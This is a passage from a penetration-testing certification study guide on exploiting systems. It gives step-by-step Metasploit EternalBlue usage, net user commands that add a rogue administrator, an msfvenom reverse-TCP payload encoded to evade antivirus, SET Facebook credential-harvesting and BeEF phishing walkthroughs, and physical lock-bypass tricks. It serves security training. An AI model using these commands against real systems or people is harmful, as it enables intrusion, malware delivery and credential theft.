Exploiting Systems using Metasploit PDF

Summary

This chapter explores system exploitation techniques, focusing on the use of Metasploit for exploiting vulnerabilities like MS17-010 EternalBlue SMB. It covers various exploit types and payload options. The document includes detailed instructions on searching for and utilizing specific exploits.

Full Transcript

EXAM OBJECTIVES

»» Using Metasploit to exploit systems

»» Understanding social engineering
and attacks on physical security

»» Learning common attack techniques

»» Exploiting network-based and
local-host vulnerabilities

Chapter 5
Exploiting Systems

A
fter you collect a list of vulnerabilities on your target systems, the third
phase of the penetration testing process is to exploit, or take advantage of,
those vulnerabilities to gain access to the target systems. For the CompTIA
PenTest+ certification exam, you should be familiar with the common types of
exploits performed to gain access to systems, including attack techniques such as
Server Message Block (SMB), pass the hash, password cracking, social engineer-
ing, man-in-the-middle (MiTM), and attacks on physical security.

In this chapter, you start the third phase of the penetration testing process by
looking at the common techniques used to exploit systems, including how to use
Metasploit to exploit vulnerabilities and how to exploit network-based and local-
host vulnerabilities.

Exploiting Systems with Metasploit
After performing a vulnerability scan on the target systems, you should have a list
of the vulnerabilities that can be exploited to gain access to those systems. One of
the popular exploit tools used to take advantage of a vulnerability is the Metasploit
Framework (www.metasploit.com). Metasploit is preinstalled on Kali Linux, but
you can also download it for other platforms if you are not using Kali Linux. In this
section, we’ll walk through how to use Metasploit to exploit a vulnerability
exposed by our vulnerability scanner.

CHAPTER 5 Exploiting Systems 155
 As you can see from the vulnerability scan results shown in Figure 5-1, a critical
vulnerability was found that is exploitable with Metasploit — the MS17-010
EternalBlue SMB exploit.

FIGURE 5-1:
Identifying the
tool to use to
exploit a
vulnerability.

Focus on the critical vulnerabilities first, as these are the vulnerabilities most
likely to give you access to the system if exploited.

Starting Metasploit
To use Metasploit, you first need to start a terminal session in Kali Linux and then
run the msfconsole command. It will take a few minutes to load and when it does,
you will see a screen similar to the one shown in Figure 5-2.

Once Metasploit launches, you will see a logo with summary information that lists
the number of exploits that exist within Metasploit. You will also notice that you
are at the Metasploit prompt (msf >), where you can type Metasploit commands.
If you ever want to see a list of commands that you can use, type ? at the prompt
and press Enter. This brings up the Help screen that shows a list of commands and
their meanings.

156 PART 2 Attacks and Exploits
 FIGURE 5-2:
Metasploit has a
number of
preinstalled
exploits.

Searching for an exploit
After loading Metasploit, the next step is to search for an exploit that can be used
to take advantage of the vulnerability. This is where you use the exploit informa-
tion from the vulnerability scan report.

In my example, remember that the exploit I can use is the MS17-010 EternalBlue
SMB exploit. I can either search on MS17-010 or I can search on the term Eternal-
Blue as follows:

msf > search EternalBlue

Looking at Figure 5-3, notice that an exploit with the path of exploit/windows/
smb/ms17_010_eternalblue has been found. The path is a logical path to help you
navigate all the exploits within Metasploit. In this example, you can see that it is
an exploit for Windows SMB called ms17_010_eternalblue.

FIGURE 5-3:
Searching
for an exploit.

CHAPTER 5 Exploiting Systems 157
 Keep in mind that we could have also searched on the Microsoft security bulletin
ID of MS17-010 with the following command:

msf > search MS17-010

The point here is that the results from your vulnerability scan are helping you
determine what exploit to use from the Metasploit Framework.

Also notice that with each exploit there is a description column and a rank
column. The rank column indicates the usual success rate of the exploit. Table 5-1
displays the rankings and their meanings.

TABLE 5-1 Metasploit Exploit Rankings
Rank Meaning

Manual The exploit is unstable or difficult to perform as much configuration must
be performed by the user.

Low The exploit is near impossible to perform.

Average The exploit is unreliable or difficult to perform.

Normal The exploit is typically reliable and cannot automatically detect the target.

Good The exploit has a default target configured.

Great The exploit has a default target and can automatically detect the target
to use.

Excellent The exploit will never crash the service being exploited.

Look for exploits that have a rank of good, great, or excellent.

Using an exploit
Each exploit is a separate module in Metasploit that you can use. Once you have
located an exploit with the search command, make a note of the path. You are then
ready to use the exploit.

In my example, I want to use the EternalBlue exploit (exploit/windows/smb/
ms17_010_eternalblue) against my Windows 7 target of 192.168.67.135. To do
this, I first need to select the exploit module to use with the use command:

> use exploit/windows/smb/ms17_010_eternalblue

158 PART 2 Attacks and Exploits
 Once you run this command, notice that your prompt changes to the exploit
prompt, which also shows the module being used (see Figure 5-4).

FIGURE 5-4:
Selecting an
exploit.

After selecting the exploit, you then must look at the options to see which options
need to be filled in (required) before executing the exploit. To see a list of options,
run the show options command, as shown in Figure 5-5.

FIGURE 5-5:
Using the show
options
command to see
a list of options.

Looking at Figure 5-5, you can see that the RHOST option (remote host) is required
and currently does not have a value associated with it. The RHOST option is the
setting for the IP address of the target system you are trying to exploit. In my
example, I need to set it to 192.168.67.135 (the Windows 7 client). Before we set the
RHOST option, notice at the bottom of the output you can see the target platforms
this exploit works on. Note in this example, the exploit works on Windows 7 and
Server 2008 R2.

CHAPTER 5 Exploiting Systems 159
 To set an option, run the set command followed by the option name and its value.
You can then view the options to verify that the setting was taken correctly (see
Figure 5-6). For example:

> set RHOST 192.168.67.135
> show options

FIGURE 5-6:
Verifying your
settings.

In this example, RHOST is the only required setting before executing the exploit.

Running the exploit
After configuring all required settings, you are now ready to run the exploit. To
run the exploit, you simply run the exploit command, as shown in Figure 5-7.
Note in the figure that the EternalBlue exploit is run successfully; the output of
WIN appears at the bottom of the screen.

Also notice that following the WIN text at the bottom of the screen is a Windows
command prompt, as shown in Figure 5-8. This is the command prompt of the
target system — you have administrative capabilities of the target!

At this point you can use any Windows commands to manipulate the compro-
mised system. For example, you can use the following commands to view the list
of user accounts on the target system and create your own administrative account:

Net user
Net user hacked Pa$$w0rd /add
Net localgroup administrators hacked /add

160 PART 2 Attacks and Exploits
 FIGURE 5-7:
Running the
exploit.

FIGURE 5-8:
You have shell
access to the
system.

You can run the net user command again to verify that the new user account was
created. To exit, press CTRL+C and then choose y when asked if you wish to abort
the session.

Setting the payload
Once you have identified the vulnerability in a system and exploited that vulner-
ability to gain access to that system, it is time to execute the payload. The payload
is the code to execute on the target once the system is exploited — it is the action
you wish to perform when the exploit is delivered to the target.

To help illustrate the relationship between the exploit and the payload, think of a
missile. A missile is made up of the rocket portion and the warhead. The rocket
portion of the missile is the delivery mechanism (the exploit) for the warhead (the
payload), which is the component designed to do the damage. Without one or the
other the missile would be useless. The same is true for an exploit and payload.

CHAPTER 5 Exploiting Systems 161
 Metasploit uses several types of payloads:

»» Bind shell: This payload sets up a listener on the target machine for the
attacker to connect to. When the attacker connects to the listener, the payload
code executes, resulting in shell access to the system.

»» Reverse bind shell: When this payload executes on the target system, the
payload code makes a connection back to the attacker’s system via an open
listening port on the attacker’s system.

»» Meterpreter shell: This payload provides an interactive shell, known as a
meterpreter session, where there are a number of built-in commands that
allow you to discover information about the compromised system.

These three payloads are the most common; there are many others. If you wish to
see all of the payloads, run the show payloads command as follows (I have cut the
output to keep it brief):

msf exploit(ms17_010_eternalblue) > show payloads
windows/x64/meterpreter/bind_tcp
windows/x64/meterpreter/bind_tcp_uuid
windows/x64/meterpreter/reverse_http
windows/x64/meterpreter/reverse_https
windows/x64/meterpreter/reverse_tcp
windows/x64/powershell_bind_tcp
windows/x64/powershell_reverse_tcp
windows/x64/shell/bind_ipv6_tcp
windows/x64/shell/bind_ipv6_tcp_uuid
windows/x64/powershell_bind_tcp

You then select a payload with the set payload command. Assuming you have
already selected the exploit and set the RHOST option as discussed earlier, you can
then set the payload with the following command and run the exploit:

set payload windows/x64/meterpreter/reverse_tcp
exploit
(output cut for briefness)
[*] Sending stage (205379 bytes) to 192.168.67.135
[*] Meterpreter session 3 opened (192.168.67.131:4444 ->
192.168.67.135:49188) at 2020-04-12 12:54:52 -0400
[+] 192.168.67.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.67.135:445 - =-=-=-=-=-WIN-=-=-=-=-=-=-=-=
[+] 192.168.67.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

162 PART 2 Attacks and Exploits
Notice that because a different payload was used, the end result of the exploit is
different (even though I am using the same EternalBlue exploit). This time a
meterpreter session was obtained on the target (note the meterpreter prompt)
where I can use a number of commands to turn on the target’s webcam, take a
screenshot, grab the password hashes from the target’s system, and so on. You
learn about the post-exploitation commands available in meterpreter in
Chapter 8.

After changing the payload, it is a good idea to use the show options command to
see if there are any payload options that need to be set. If you ever get an error
when you run the exploit command, use show options to see if a mandatory
option is missing.

Using msfvenom
Msfvenom is a payload generator used to generate and output the shell codes
available in Metasploit. One example of using msfvenom in Kali Linux is to use it
to create a malicious program that will connect the victim’s system to your pen-
test system (a reverse shell), enabling you to obtain a meterpreter session with
the target.

This exploit is an example of a program that you can create and put on a dropped
USB flash drive to see if anyone picks up the USB stick and runs the unknown code.
Once the meterpreter session is obtained, you can then download files from the
victim’s computer, obtain password hashes, use the webcam, and run many other
post-exploitation commands.

The following steps can be used to exploit a system with malicious code you gen-
erate with msfvenom.

Phase 1: Create the malicious program
1. On your Kali system, run ifconfig in a terminal session and record the IP
address: _____________________.

2. In the terminal session, type the following command to create a mali-
cious program that obtains a meterpreter session with the victim using a
reverse TCP shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444
-a x86 --platform win -e x86/shikata_ga_nai -f exe -i 15 > /root/
Desktop/ClarkeMalware.exe

CHAPTER 5 Exploiting Systems 163
 Where:

-p specifies the payload you wish to use.

LHOST specifies the IP address with which to obtain a reverse connection.
This will be the IP address of the Kali system that will run a listener waiting
for the program to connect.

LPORT specifies the port to connect to on the Kali system.

-a x86 specifies the architecture of x86 for the created code.

--platform win specifies the code generated is for a Windows system.

-e specifies the encoder to use.

-f exe specifies the format of the generated code is to be an.exe file.

-i 15 specifies to encode the program 15 times as an attempt to hide the
malicious code from antivirus software.

> specifies the filename to generate.

Phase 2: Set up a listener on your system
Before sending or copying the file to the intended victim, you will need to set up a
listener on your Kali Linux system.

3. Run the following commands on Kali Linux to set up a listener:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
exploit

Notice that your system is now listening for a connection (see Figure 5-9). Once
someone runs the malware program, that person’s system will connect to this
listener, giving you a meterpreter session on that system.

FIGURE 5-9:
Setting up a
reverse TCP
listener.

164 PART 2 Attacks and Exploits
 Phase 3: Trick users into running the program
The next step is to either trick the users into running the program by emailing it
to them in a social engineering attack, or putting the program on a USB flash drive
for users to find and insert into their own systems. Keep in mind that up-to-date
antivirus software running on a user’s system will most likely block the program.

4. Copy or email the malware to the target system.

When the user runs the program, the user’s system will connect to your Kali
Linux system (the pentester system). Once connected, you will have a meter-
preter shell to do as you please with the user’s system.

5. To see an example of a meterpreter command you can use, run the
screenshot command to take a screenshot of the user’s system (see
Figure 5-10).

You learn more about meterpreter commands in Chapter 8.

FIGURE 5-10:
Taking a
screenshot of the
victim’s system.

Using exploit resources
Learning about vulnerabilities and exploits against systems can be a time-
consuming task; therefore, knowing how to research for vulnerabilities against a
specific product effectively is an important skill for a penetration tester. Following

CHAPTER 5 Exploiting Systems 165
 are common websites used by penetration testers to locate exploits against differ-
ent products:

»» Exploit-DB exploit database (DB): The Exploit-DB exploit database is a
popular source of information on exploits against vulnerable software. The
exploit database is found at www.exploit-db.com. At the site you can search
for a particular product and then read about and download exploits against
the product.

»» Packet Storm: Another common website that includes a listing of exploits
against different software is Packet Storm, located at packetstormsecurity.
com. In the top-right corner of the main screen you can search for a product
and then get a listing of exploits for that product.

Understanding Social Engineering
Social engineering from a security standpoint refers to the deliberate use of decep-
tion to try to trick a user into compromising system security through social con-
tact such as an email message, a text message, or a phone call. Social engineering
attacks are a common way to test the effectiveness of a company’s security educa-
tion program. If the engagement rules and scope of the penetration test support
social engineering attacks, you should plan for them in the penetration test.

There are different types of social engineering attacks such as phishing, shoulder
surfing, and USB key drop, among others. Let’s take a look at the different types
of social engineering.

Email phishing
Phishing is a type of social engineering attack that occurs when the hacker sends
an email message to a user with the hope that the user will click on hyperlinks
within the message. These hyperlinks link to malicious websites that collect
information from the user. For example, a hacker may send an email message that
appears to be from the user’s banking institution, and links within the message
take the user to a site that looks like the bank’s site. Because the site looks familiar
to the user, the user may then feel comfortable supplying account information,
not knowing it is a fake bank site. All the time this is going on, the hacker is col-
lecting the information that is typed into the fake site.

166 PART 2 Attacks and Exploits
With a regular phishing attack, the hacker sends the email message to a pool of
email addresses the hacker was able to discover without really any thought to who
the email goes to. When you do a penetration test, you can do the same: Collect
a bunch of email addresses for the target organization and then email all the
addresses to see if someone goes to the fake site.

Phishing attacks occur in the following different forms:

»» Spear phishing: Refers to a phishing attack that targets a specific person.
»» SMS phishing: Short message service (SMS) phishing, also known as smishing,
is a phishing attack conducted through text messaging instead of email.

»» Vishing: Phishing attacks that use voice over the phone instead of email.
»» Whaling: Refers to a phishing attack that targets the “big fish” of a company,
such as the CEO.

For the PenTest+ certification exam, remember the different forms of phishing
attacks. Also remember that the rules of engagement should identify whether
social engineering attacks are allowed in the penetration test.

USB key drop
Another type of social engineering attack common with penetration testing is a
USB key drop. With a USB key drop, the pentester will leave USB flash drives all over
the organization in hopes that an employee picks it up and plugs it into a com-
puter to see what is on the drive. As a penetration tester, you will configure a
script or application to automatically run when the drive is connected that will
send an email message to you that includes information such as the IP address of
the system the drive is connected to.

With USB key drop, you are able to find out the security awareness level of the
organization. If you set out ten USB drives and you get eight email messages, it is
obvious that the employees do not understand that they should not connect
untrusted devices to their computers.

Another benefit of using a USB key drop with your penetration test is that you can
use it to collect information such as IP addresses of hosts on the network. You can
then use these IP addresses as IP addresses of potential targets.

CHAPTER 5 Exploiting Systems 167
 Other forms of social engineering
In addition to the types of social engineering attacks discussed in the previous
sections, social engineering attacks may also take the form of impersonation,
interrogation, and a watering hole attack. For example, a hacker (or pentester)
could impersonate an administrator to try to trick users into compromising secu-
rity (for example, maybe the hacker convinces users to change their passwords).
If social engineering attacks are in the scope of the assessment, you could try call-
ing or emailing employees and impersonating the administrator to trick the
employees into compromising security. You could also impersonate a user who
contacts the administrator and see if the administrator can be tricked into helping
you access the system.

Interrogation is specifically called out in the objectives of the CompTIA PenTest+
certification exam as another form of social engineering attack. When interview-
ing or interrogating people, a number of physical reactions to questions can be
used to identify topic areas that should lead to more questioning. For example,
when people start to feel stress, they usually start to touch their face a lot —
watch for these visual cues during interviews and interrogation.

Another form of social engineering attack is a watering hole attack. A watering hole
attack is when a hacker compromises a popular website and then places code on
the site that will execute in the browser of anyone who visits the site. That code
then compromises the visitor to the site and gives the hacker access to the visitor.

The key point to remember about social engineering is that your goal is elicitation.
You would like to elicit a response or reaction from employees that cause them to
compromise security. You could also use a business email compromise (BEC) attack
where you gain access to an employee’s corporate email account and use that to
send messages to other employees in the company.

Methods of influence
What are some of the methods of influence used in social engineering attacks that
cause the attack to be successful? A common technique is to evoke a sense of
urgency for the end user to click the link in an email message from the hacker.
When social engineering attacks are sent out, the hacker usually stresses a sense
of urgency to act now as a method to get the user to click the link or run the appli-
cation without thinking about it too much.

Following is a list of influence techniques often used by the hacker or penetration
tester to get a user to compromise security:

168 PART 2 Attacks and Exploits
 »» Authority: The hacker or penetration tester pretends to be a person of
authority requesting that the user perform an action. This action, such as
clicking a link in an email message or changing a password, is enough to help
the hacker gain access to the system.

»» Scarcity: The communication from the hacker or pentester typically implies a
shortage in time or the chance of a prize in order to trick the person into
acting now.

»» Social proof: The hacker or pentester relies on the concept that if users see
others doing something, they feel it is the correct thing to do, so they do it too.
For example, if everyone is downloading a certain program, a user may feel
that it must be safe if everyone else is doing it.

»» Urgency: The hacker or pentester evokes a sense of the importance of a swift
action in order to get users to act on the request.

»» Likeness: People respond well to people they like and are by nature typically
willing to help someone in need. If the attacker can appear to be in need and
has a friendly demeanor, victims may let their guard down and be more likely
to respond to the social engineering attack.

»» Fear: The hacker or pentester uses fear to elicit a response from the user.
For example, a hacker sends an email message telling the user that a security
vulnerability was found in the system that gives someone full access to the
system, and to remove this vulnerability, the user must install a “patch.” In
reality the patch is the malicious software that allows the attacker into the
system.

Using SET to perform an attack
The Social-Engineer Toolkit (SET) is a tool available in Kali Linux that allows you
to perform a number of social engineering exploits to gain access to a victim’s
system or compromise the victim’s password.

Let’s take a look at an example that uses SET to clone a popular website. When you
trick users into visiting a cloned site, users think the clone is the real site and may
enter their logon credentials into the site for SET to capture.

Phase 1: Set up the cloned site
1. On your Kali system, run ifconfig in a terminal session and record the IP
address: _____________________.

2. In the terminal session, run the setoolkit command to launch SET.

SET will display the terms of use.

CHAPTER 5 Exploiting Systems 169
 3. Choose y to agree to the terms and go to the SET main menu screen.
4. Type 1 to perform a social engineering attack and press Enter.
With SET, you can perform many different types of attacks.

5. Type 2 for Website Attack Vectors and press Enter (see Figure 5-11).

FIGURE 5-11:
Using SET to
clone a website.

6. Type 3 to perform a credential harvester attack and then press Enter.
7. Type 2 to choose Site Cloner and press Enter.
Site Cloner is used to copy a real website in order to create a fake site that
tricks users into entering their passwords.

Once you press Enter, you are asked for the IP address for the POST back in
Harvester/Tabnabbing. This is the IP address of where you want the site to be
copied (keep in mind we haven’t told SET the website to copy yet).

8. Type the IP address of your Kali Linux and press Enter.
You are asked which website to clone.

9. We will clone the Facebook website for this example, so type https://
www.facebook.com.

The Facebook site is copied to your Kali system and set up to listen on port 80.

10. To test the site out, launch a web browser and type
http://.

You should see what appears to be the Facebook website.

170 PART 2 Attacks and Exploits
 Phase 2: Trick the victim into visiting the fake site
Now that you have a fake site set up that looks like Facebook, you next want to
trick users into visiting that site. One method of doing this is to send an email to
the users with a link that displays the display text of Facebook, but the URL goes
to your fake website.

11. While SET is running, have users navigate to your fake website and log on.

Phase 3: Check the harvester file for passwords
As users are attempting to log on to the site, SET is logging the usernames and
passwords. You can have a report generated by following these steps:

12. Switch back to the terminal running SET.
You should see some activity was generated in SET.

13. Press CTRL+C to generate a report.
Note that the reports are stored in the /root/.set//reports folder. There is
an HTML and an XML report.

14. To check out the HTML report, click the folder icon in the Kali toolbar and
then choose Home on the left.

15. Note that by default Kali does not show hidden folders, so choose the
Options button to the left of the minimize button in the folder window.

16. Choose the Show Hidden Files check box at the bottom.
Now you can see the.set folder.

17. Navigate to.set/Reports.
18. Double-click the HTML report to view the results including any email
addresses and passwords typed into the fake site (see Figure 5-12).

FIGURE 5-12:
Viewing
credentials
collected
using SET.

Using BeEF to perform an attack
The Browser Exploitation Framework (BeEF) is an exploitation tool that focuses
on exploiting a victim’s web browser. BeEF can be used to generate malicious code

CHAPTER 5 Exploiting Systems 171
 to embed into a web page. When a user visits that web page, the code establishes
a connection to the user’s system, giving you control of that system using the
BeEF console. Once you’ve established control of the user’s system, you can then
perform such post-exploitation tasks as starting the user’s webcam or recording
the user’s keystrokes. Let’s walk through an example of using BeEF on Kali Linux.

Phase 1: Start BeEF
1. On your Kali system, run ifconfig in a terminal session and record the IP
address: _____________________.

2. To run BeEF on your Kali system, type the following commands:

cd /usr/share/beef-xss./beef

Notice that BeEF starts after a short time and displays the interfaces BeEF is
running on. For the interface that has the IP address you recorded earlier, note
the URLs of the Hook and the UI:

Hook: _________________________________________

UI: ___________________________________________

The Hook is the malicious code you will call from a web page; the UI is the
administrative console used by the attacker to control the victim’s system (see
Figure 5-13).

3. On your Kali system, launch a web browser and navigate to the user
interface (UI) URL you noted.

4. Log on with the username of beef and the password of beef.

Notice that there are no online browsers listed on the left side of the screen.

FIGURE 5-13:
Launching
BeEF and the
hook URL.

172 PART 2 Attacks and Exploits
Phase 2: Create the malicious site
5. On your Kali system, launch a new terminal window (leave BeEF running
in its own terminal) and type the following to start an Apache web server:

service apache2 start

After the Apache web server is started, use the folder list to navigate the file
system and locate the web page we wish to modify.

6. Navigate to Other Locations ➪   Computer ➪   | var ➪   www ➪   html.
7. Right-click index.html and choose Open With Other Application.
8. Choose View All Applications and then highlight Text Editor.
9. Choose Select to open the web page in a text editor.
10. Once the file has opened, press Ctrl+A to highlight all of the contents and
then press Del on the keyboard to delete the contents.

11. Type the following text in the file to create a web page:

Welcome to Company Website
Welcome to our company website. We have a number of services that can
help you.

12. Modify the section to include a reference to the hook URL:

The hook URL references the malicious JavaScript code we wish to execute
within the web page.

13. Save and close the file.

CHAPTER 5 Exploiting Systems 173
 Phase 3: Attack client systems
For the browser exploitation to work, you next need to trick the user into visiting
your website. You can use social engineering attacks such as sending an email
with the link, sending a text message with the link, or placing a link on another
web page.

14. From a different system, navigate to http:// to surf the
website (normally you would trick the user into clicking a link to go to
this site).

You should see the company website.

15. Switch back to your Kali Linux system.
16. While the user is connected to the company site, go back to the BeEF UI
site and you should see the client connected on the left side of your
screen (if not, refresh the page).

17. Click the Commands tab to see a list of commands you can send to the
compromised system.

In the Module Tree you can see all the different commands and exploits you
can send to the visitor.

18. Expand Social Engineering and then select Google Phishing (see
Figure 5-14).

FIGURE 5-14:
Using the BeEF UI
to execute
exploits.

19. Click the Execute button that appears on the right side of the screen.
This causes a Google logon page to appear on the victim’s system. When the
user logs on, the victim’s username and password are logged into the BeEF UI
console. Note that if you want the user to be redirected to a specific web page
after the user attempts to log on, you could put the URL in an XSS hook URL
field.

174 PART 2 Attacks and Exploits
 20. Choose the command from the Module Results screen to see the user-
name and password the user entered to log on to Google (see Figure 5-15).

FIGURE 5-15:
Looking at the
captured logon
information.

Google Phishing is a quick example of a command in BeEF. As you can see when
you browse the list, there are many different exploits you can use to take over the
victim’s system including gaining a meterpreter session.

Call spoofing tools
Call spoofing occurs when the hacker performing a social engineering attack over
the phone alters the phone number that displays in a victim’s caller ID. This helps
the attacker avoid being blocked by the victim’s phone. A number of techniques
and tools can be used to spoof calls, such as using a VoIP service or by using prod-
ucts such as SpoofCard. After purchasing SpoofCard, you then call a 1-800 number
and supply your PIN number along with the number you would like to display in
the victim’s caller ID and the victim’s phone number to call.

Pretexting
Pretexting is an important part of social engineering attacks. It refers to the fake
scenario or “pretext” attackers present to potential victims in order to complete
the attack. For example, attackers may make a call or send an email to a potential
victim to say that they are from the fraud department at the victim’s bank and
that they have noticed suspicious activity related to the victim’s account. Attack-
ers would then ask the potential victim to click a link to log into the victim’s bank
account to verify the transactions. The fact that the attackers state that they are
from the fraud department and that they have noticed suspicious activity ensures
that potential victims see the urgency and may not think twice about clicking the
link that takes them to a fake site where attackers collect their login information.
The pretext (scenario) is used to trick users into compromising security or divulg-
ing sensitive information.

CHAPTER 5 Exploiting Systems 175
Looking at Attacks on Physical Security
Physical security plays an important role in any organization’s security program
and defensive posture. Physical security involves controlling who has physical
access to the facility, the servers, network equipment, and end-user devices.

Types of physical security controls
Organizations use a number of physical security controls to regulate who gains
access to the facility or what areas in the facility they gain access to. Highly
secured environments control access to the facility by having high fencing around
the perimeter of the property with only one or two entrances used to enter or leave
the facility. These entrances will have gates and security guards that control who
gains access to the building. In highly secured locations, the guard ensures that
everyone who enters has an ID badge. Visitors typically need to get a guest badge
and be escorted by the employee that has the visitor to the facility.

Once inside the building, doors are locked to control who can gain access to dif-
ferent areas of the building. Companies can use traditional lock and keys, combi-
nation locks, or use electronic locking systems where a card needs to be swiped in
order to gain access to that area of the building.

Exploiting physical security
A number of methods may be used to bypass physical security controls. As a pen-
etration tester, you may need to test these physical controls and see if you can
bypass the security to gain access to areas of the building you should not have
access to.

Piggybacking/tailgating
To compromise physical security as a penetration tester, you can try to follow an
employee who does have access into a restricted area of the building after the
employee unlocks the door. There are two terms for this type of physical security
attack:

»» Piggybacking: Piggybacking occurs when employees use their swipe card
(key) to unlock a door and then allow the person behind them into the locked
area as well without making that person swipe a card. This is exploiting the
person’s human nature to be kind and hold the door open for the next
person. As the penetration tester, you want to test to see if you can piggyback
into the facility as this identifies a huge security concern. Note that with
piggybacking, people are aware that they are allowing you in.

176 PART 2 Attacks and Exploits
 »» Tailgating: Tailgating is similar to piggybacking with the exception that
employees have no idea you slipped through the door after they had
unlocked it.

For the PenTest+ certification exam, remember the difference between piggy-
backing and tailgating. Piggybacking involves the employee knowing and allow-
ing someone to gain access to a restricted area, while with tailgating, the employee
did not know someone was able to gain access after the employee unlocked
the door.

A great countermeasure to implement to prevent piggybacking and tailgating is a
mantrap. A mantrap is an area between two locked doors. The second door does
not unlock until the first door locks. This ensures employees know who is with
them at all times. Revolving doors is another type of mantrap that helps ensure no
one else slips through the door while an employee is going through.

Dumpster diving
A method to discover sensitive information about a company and its employees is
to dumpster dive. With dumpster diving, the attacker goes through the garbage of
the intended victim trying to locate information that could help in an attack.

It is important to shred all sensitive documents so that the sensitive information
cannot be discovered via a dumpster dive attack.

Shoulder surfing
Shoulder surfing is a traditional type of attack in which the hacker watches over the
shoulder of the user to see what the user is typing on the computer or mobile
device to obtain information.

Badge cloning
Electronic badges often are used to gain access to restricted areas within a build-
ing. If attackers can get their hands on a badge, they can use a badge cloning
device to copy the electronic data stored on the badge that can then be used to gain
access to the building.

Fence jumping
Having a fence around the perimeter of the facility is only going to keep the inno-
cent people out. A determined hacker can easily climb the fence to gain access to
the facility, so it is important that you have designed a fencing strategy that makes
it difficult to climb. Most highly secured environments will use a high fence that

CHAPTER 5 Exploiting Systems 177
 angles out at a 45-degree angle at the top to make it difficult for someone to climb
over. Companies will also have barb wire at the top to prevent someone from try-
ing to climb over the top.

Attacks on locks
Traditional locks are susceptible to lock picking in order to gain access to the locked
area. A bump key is one example of a lock-picking technique where a filed-down
key is placed in the lock and then tapped (bumped) lightly while turning the key
slightly. This causes all of the cylinders within the lock to jump up above the cyl-
inder breaking point (hopefully), which would then unlock the door. Many high-
quality locks today advertise that they are “bump proof.”

Lock bypass is another lock-picking technique in which different methods are used
to bypass the locking system. One technique used to bypass a lock is loiding, in
which a credit card is used to bypass a self-closing latch system. Car locks can be
bypassed by inserting a stiff wire between the door and the car structure in order
to manipulate the locking system.

Another example of an attack on locks is for motion-sensor doors that are in a
locked state until they detect that someone is trying to leave from the inside, at
which time the door is unlocked. These doors use egress sensors (to detect people
going out) that are motion sensors. There is a known hack where hackers are able
to spray compressed air from outside through the cracks in the door to trigger the
motion sensor to unlock the door.

Common Attack Techniques
System attacks may be performed in a number of different ways in order to gain
access to a system. Some common techniques used to attack a system involve
password attacks and running exploits against a system, as well as using social
engineering techniques, as discussed earlier in this chapter.

Password cracking
Password cracking is a common technique used to gain access to a system, and
there are many different types of password attacks.

178 PART 2 Attacks and Exploits
Dictionary attacks
A dictionary attack occurs when a password-cracking program uses a dictionary
or wordlist file that contains all of the words in a language dictionary. This file is
then fed into the program, typically with a list of usernames to try. The program
then reads the dictionary file, trying each of the words as the password for the
user accounts.

Dictionary attacks are very fast password attacks because no calculations are
needed; the program simply reads the file to get the list of passwords.

Credential brute forcing
Brute-force attacks occur when the password-cracking program calculates every
possible password based on the criteria you supply. You would typically configure
the program for the password length to try and the character sets to use (for
example, 0-9, A-Z, and symbols). The program will try each password one after
the other, eventually calculating the correct password given enough time.

Brute-force attacks are much slower than dictionary attacks, but given enough
time they can be very effective.

Hybrid
A hybrid password attack is the combination of a dictionary attack and calculating
passwords. A hybrid password-cracking tool will try each word in the dictionary
file and then will add numbers to the end of each word to account for passwords
that contain both words and numbers (for example, house2020).

Rainbow tables
Brute-force attacks are very effective, but are extremely slow and can take years
to complete. To speed up the process, you can generate or download rainbow tables,
which contain all of the passwords from a brute-force attack pre-calculated into
a file. The benefit of using a rainbow table is that when you perform the password
attack, you can supply the rainbow table that already has all the passwords calcu-
lated. You get the effectiveness of a brute force, while getting the speed of a dic-
tionary attack (because the password-cracking tool is simply reading a file).

Password spraying
Password spraying is a type of password attack that involves the attacker attempt-
ing to log on to many different accounts with the same password. The password is
a well-known password, or a default password, that is typically used in that envi-
ronment. The goal of the password spraying technique is to find an account that
may be using a common password.

CHAPTER 5 Exploiting Systems 179
 Hash cracking
Many of the password-cracking tools involve grabbing the password hashes of
user accounts and then cracking the password hashes. John the Ripper is an exam-
ple of a tool that cracks password hashes.

Using exploits
Another common technique to attack a system is to use exploits. You learn earlier
in this chapter that you can use Metasploit, which is a tool that contains a number
of exploits that are ready to use. That is not the only way to use exploits; you can
create your own or download them from an exploit database site.

Exploit database
Once you know of a vulnerability that exists within a system, you can search an
exploit database for the exploit. The Exploit Database (www.exploit-db.com) is
one example of a database you can search. Notice in Figure 5-16 that I searched
the Exploit Database for MS17-010, which is the exploit reported by Nessus when
I did a vulnerability scan of the system.

FIGURE 5-16:
Using an exploit
database.

When the results appear, click the link for a result to view the details. When look-
ing at the details of the exploit, you can see the following information (see
Figure 5-17):

180 PART 2 Attacks and Exploits
 »» The exploit database ID for the exploit
»» The common vulnerabilities and exposure ID number for the vulnerability
»» The author of the exploit and the type of exploit (in this case it is a remote
exploit)

»» The platform for the exploit

FIGURE 5-17:
Looking at
exploit details.

There is a download link for the exploit, but you can also scroll down to see the
code for the exploit.

Metasploit already has the exploits downloaded for you in the one tool, to save you
from downloading exploits from a database. Keep in mind that it is always worth
checking an exploit database if you do not find an exploit in Metasploit that suits
your needs.

Proof-of-concept development
(exploit development)
You can also develop your own exploits instead of using exploits provided in
Metasploit or in an exploit database. In order to create your own exploits, you
must have expert knowledge of the programming language you are using to create
the exploit and knowledge of the vulnerability for which you are creating the
exploit.

CHAPTER 5 Exploiting Systems 181
 Developing your own exploit is a great way to demonstrate proof of concept that
the exploit can happen without focusing on performing malicious activity on the
target system.

Cross-compiling code
One of the benefits of using an exploit database to search and download exploits
is that you typically are able to download the source code for the exploit. When you
download the source code for an exploit, you can compile the code to the platform
that works for you. For example, if you want to run the exploit from a Windows
system, you can compile the code for Windows.

Exploit modification
Another benefit to getting access to the source code of an exploit is that you can
modify the exploit to fit your needs before compiling the exploit.

Exploit chaining
Exploit chaining is the concept that many attacks are a combination of different
exploits run one after the other. For example, the attacker could first exploit the
web server to then be able to exploit the database server.

Deception
There are many different types of exploits, but you cannot forget the exploit of
deception, which is the technique used in social engineering attacks where the
attacker tricks users into compromising security. The attacker does this by con-
vincing users to install software that is a trojan virus, or run a script that creates
a user account for the hacker, or convinces users to change their passwords.

Exploiting Network-Based Vulnerabilities
Exploits that are created to leverage network-based vulnerabilities are interesting
